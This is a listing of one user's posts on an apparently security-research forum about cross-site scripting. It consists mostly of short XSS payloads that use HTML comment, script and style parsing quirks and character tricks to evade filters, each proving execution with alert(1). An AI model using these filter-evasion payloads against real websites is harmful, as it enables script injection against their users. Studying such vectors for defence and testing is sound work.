Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Current Page: 1 of 1
Results 1 - 8 of 8
2 years ago
jackmasa
<!-- `<img/src=xx:xx onerror=alert(1)//--!> <!-- " --!><input value="><img src=xx:x onerror=alert(1)//"> <!> <![<img src=x:x onerror=alert(1)//]--> <style>//<!--</style> -->*{x:expression(alert(URL=3))}//<style></style> <xmp><!--</xmp><img src="//mmme.me#--></xmp>&l
Forum: XSS Info
2 years ago
jackmasa
Superver of trick: <script><!-- </script> <img src=1 onerror=alert(1)> the some also: <style><!-- </style> <img src=1 onerror=alert(1)> <textarea><!-- </textarea><img src=1 onerror=alert(1)>
Forum: Obfuscation
2 years ago
jackmasa
Gareth of trick: <noscript><!-- </noscript> <img src=1 onerror=alert(1)> -->
Forum: Obfuscation
2 years ago
jackmasa
keep play: <>>//<!/>
alert(1)
Forum: Obfuscation
3 years ago
jackmasa
Meet the conditions: \uxx2a+\u002f like /*娪/alert(1),娪==\u5a2a or /*帪/
Forum: Obfuscation
3 years ago
jackmasa
1.Javascript IE:<script>/*@cc_on!alert(1)//*/</script> Chrome:<script>/*猪/alert(3)//*/</script> All:<script>/ //alert(1)</script> 2.HTML <img/<!--/src=x:x onerror=alert(2)//--> <!----> <!-- --!><img src="x:x" onerror=alert(1)/ />--> chrome firefox <!-- ><img src="x:x" onerr
Forum: Obfuscation
3 years ago
jackmasa
hi infinity,"<?php echo chr(12)?>" is a ascii char,equal to javascript:String.fromCharCode(12).
Forum: XSS Info
3 years ago
jackmasa
<?php echo chr(12)?> is also good
Forum: XSS Info
Current Page: 1 of 1